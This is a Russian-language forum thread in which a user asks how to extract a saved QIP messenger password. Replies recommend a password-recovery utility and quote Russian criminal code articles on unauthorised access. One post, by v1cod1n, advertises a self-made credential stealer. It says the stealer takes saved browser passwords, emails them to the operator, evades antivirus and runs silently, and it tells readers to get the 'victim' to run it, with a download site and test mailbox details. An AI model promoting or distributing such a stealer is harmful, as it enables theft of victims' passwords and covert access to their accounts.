Украсть пароль от QIP

Pixel-AQ

Известный деятель города
#1
Короче суть такова ) на компе у меня 2 аськи одна основная вторая дополнительная, там когда с мобилы перекинуть ссылку или как обменник интересных ситуациий и шуток используется.
Вот при входе в qip 8095 стоит галочка сохронять пароль, 1 раз сохранил и все больше не трогал так и автоматом входит, но тут понадобилось вспомнить парольи все хана не могу ни как, мыло естественно левое у аськи) она также работает и по сей момент на авто входе.

Суть всей темы такова, раньше была прорамка весом около метра, она тырила пароли от аси на компе, так вот ни как ни могу вспомнить ее название.
Ну а что требуется от вас это посоветовать способ вытащить пароль с компа, мот програмулины есть какие...
 

Pixel-AQ

Известный деятель города
#2
Нет ) ася моя ) и на моем компе ) блин....

Вот еду я в маршрутке, мне друзья кидают ссылку, а я в асе с телефона, я ее копирую на свой 2-й номер запущенный с компа, который всегда включен, домой приезжаю и смотрю ссылку, также 2-й номер используется для друзей, например они на тот номер кидают заявочки что им скачать, я придя домой добавляю в закачки.

Так и скажи: поимел доступ к компу подруги, глянул контакт лист, теперь хочу читнуть ее мессаги кое к кому..
А что бы почитать месаги мне не нужно пароля от аси, достаточно зайти в history в квипе
 

athlon74

Гость города
#6
Multi Password Recovery (сокр. MPR) - многофункциональное решение для Windows по расшифровке и тестировании паролей на стойкость. MPR автоматически находит и мгновенно расшифровывает пароли из более чем 100 популярных программ (FTP, E-mail клиенты, Интернет пейджеры, Браузеры и пр.), при этом, не требуя вмешательства пользователя. Кроме расшифровки, показывает пароли под здездочками, позволяет скопировать SAM файл, удалить сохраненные пароли, сгенерировать новый пароль, сохранить отчеты на жесткий диск.
 

v1cod1n

Гость города
#7
Однажды собрал сборник программ и назвал ее "Vicodin" "v11m"!

Данная сборка может використовуваться у разных целях как для восстановления забытых паролей в веб-браузерах так и ворування паролей в жетвы.

Суть работы программы заключаеть в том что она крадет сохранени пароли в веб-браузерах и отсылает вам на почтовый ящик. Вам только нужно "заставить" жертву запустить данную программу.


Преимущества v11m:
- Ворует все сохранени пароли в веб-браузера.
- Антивирусы не видят его как вируса.
- Работает в тихом режиме.
- Чистка за собо.

Vicodin_beta

Для того чтобы вы убедились у роботоспособности программы я создал beta версию (только Internet Explorer,+ip,+log). Вам нужно сохранить некий пароль в Internet Explorer если не сохранены, скачать Vicodin_beta, запустит и зайти на почтовый ящик убедиться в его работоспособности.

Сайт: www.yandex.ru
Логин: v1cod1n-pass
Пароль: 11111111


Подробнее на сайте v1cod1n.narod.ru
 

Aikis

Меня знают многие ;-)
#8
Статья 138. Нарушение тайны переписки, телефонных переговоров, почтовых, телеграфных или иных сообщений
1. Нарушение тайны переписки, телефонных переговоров, почтовых, телеграфных или иных сообщений граждан —
наказывается штрафом в размере от пятидесяти до ста минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период до одного месяца, либо обязательными работами на срок от ста двадцати до ста восьмидесяти часов, либо исправительными работами на срок до одного года.


Статья 272 УК РФ. Неправомерный доступ к компьютерной информации
1. Неправомерный доступ к охраняемой законом компьютерной информации, то есть информации на машинном носителе, в электронно-вычислительной машине (ЭВМ), системе ЭВМ или их сети, если это деяние повлекло уничтожение, блокирование, модификацию либо копирование информации, нарушение работы ЭВМ, системы ЭВМ или их сети, - наказывается штрафом в размере от двухсот до пятисот минимальных размеров оплаты труда или в размере заработной платы или иного дохода осужденного за период от двух до пяти месяцев, либо исправительными работами на срок от шести месяцев до одного года, либо лишением свободы на срок до двух лет.